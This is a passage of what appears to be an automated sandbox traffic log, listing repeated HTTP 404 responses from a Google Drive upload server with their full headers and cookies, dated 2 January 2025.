ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO; expires=Fri, 04-Jul-2025 19:28:47 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC714OY6lN9GeZAqrrpU3d3lJD3AoLeb1qg5Bf9XfnRF4B3LX4WNDnq0j9ua3C0s4daz9iXqUUwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:47 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-A3uh3cPYMgjzeORY3fSszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA; expires=Fri, 04-Jul-2025 19:28:47 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CNHwX9ByHVXLK2Y9Mwd1W8viNGc9rxnwqof6_zCnMcKd-18W1uKplLlKEvywA466zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:48 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-K1csnrv3Ux_WCWGxo_1g2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I; expires=Fri, 04-Jul-2025 19:28:48 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZwEnc1PIb9I5MrNJdEstaIf-fWQDifZcFfCBG4QZSHQSbyeihm2h9Y1MoHKXibzE06zSbEFMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:48 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-RFAbyrQyclH2TtKasGQgrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0; expires=Fri, 04-Jul-2025 19:28:48 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7gj7_b01SB6FOTz6_v_j-HVhU2FRmuINHpSdtZaLmswnDBeKtv8RkGPB9zsAujc1JHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-z2ou07_Y7Fb5ypCiiRoJ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4g0-41Yd7urjb8YlZe0p7oF1IxGPBtka-XDS_GqTinRWdaVfx2yLiyap4aTubjItYxVzoMiE8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Sd3jW0SFVWaRzaOeMy3xPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KJFiglguqkMGIEryVKLHFUgJ4hFALmh_HggJ5tjtOrYHTZmlaNMJxzxW8xayu0VW6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-KbHBHt76ErsfzD2VjweSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6BGX44tbcQX5mNsOuorCDFlvfJweSN4AWdCeOkKlBF7Pw9YGo3O3FEugFdb9ktBL_0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wTGTtTGOg1pqd1QFcsiEgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Y5qfRvFEVEpDNqVkEEalEaJfHBWgLocvi1Hw0eMljV8sa-woEE2gUwDsaic2Na0x-017kXPEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:53 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-dIssyTTKf0R26Wf_M4lPAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fihzvprkEarBUOjHrPty6BHh1u4p0RZkqzW6MubeEwPcelLlk5O14SNZteJuJaEwou26As8kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:53 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tU6HTSZdCDon1rz2ihppvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7SG9ueF-zDUEHGjDaMlVzNK3MtgdWfy_NsfeNaz-Bd8LWbw6gYZ6CWjYUZOGsj8Epz00vD3lkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:56 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0Q7aIy2pj2g5MfqRwuEnfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5GrKxLaq86KQt_GLnYGt8Si4wgr5nMSiK0NgJJBz2hJum9st7AcNCqbKoXi5OafKM4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-tMz8q7_vdm_InKxcQ9v8sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fQXYwYUAmjIR0fCsZxyzUNZbORc4_O-SRT--4C--80aig3iDBHJ29JWsmlW61FdshContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:57 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-lpMgTfAJ1jrHdA8-IrWTTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5a7X5JJb-Fn_H9DuYeBqKCWt-Xy7-vEVi_TBLDyR4af6snPb9HR1ISFAEMehGfKAOPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:57 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bOesnIhNVTmNv1ZnNsAFBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LNAhF-WZImqMJE2h1aw20IWxl_pX39ks43SM4QMA9u87e5Y0E_DDdTo4AJXc11ZrXV-rG2cAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PBBHbP74qaPcYsk6Eh8Qmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4txd3J3z7NtVkRjz7-fdvZhtTrvPNZpwc888c0pD7f-rHnNwa06iU0VLgI3IuaecbAveIQ_oUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qc1fQdVIWz8oLKA3Wduvpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WbCL8cV0zRYT9GLuetqJpzU15IIX3-R84NvHXezU5Ozx9G-RNWmkZQgqip8xprEa6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:01 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--acklA5EADnoaowUL6Ox5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Sj2xJNtXm2JWAqdfXLkWjKsEwoQEvlgIIoMOWJznSd2J2OY2paMd-VA6Xd8BaSfs9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:01 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GrLzfUWsrSgGewT7aUB55A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC51A9Q-IEt5H_A7BmmAGcISxAnkDn459a35Bc0KN64_31Cdo3zAx5IfgT80JBefK1AYd3Z7_PgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:04 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-aTKSeuoI7bcHS9TxX_8rBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6619NRU2svW49RRG81jeGP7dvMM36VFMLATIiLpWDasnPfntLm7NIOHmjUxoKw7NmXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kNmg2oDJKNSLSj8-btJovw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, 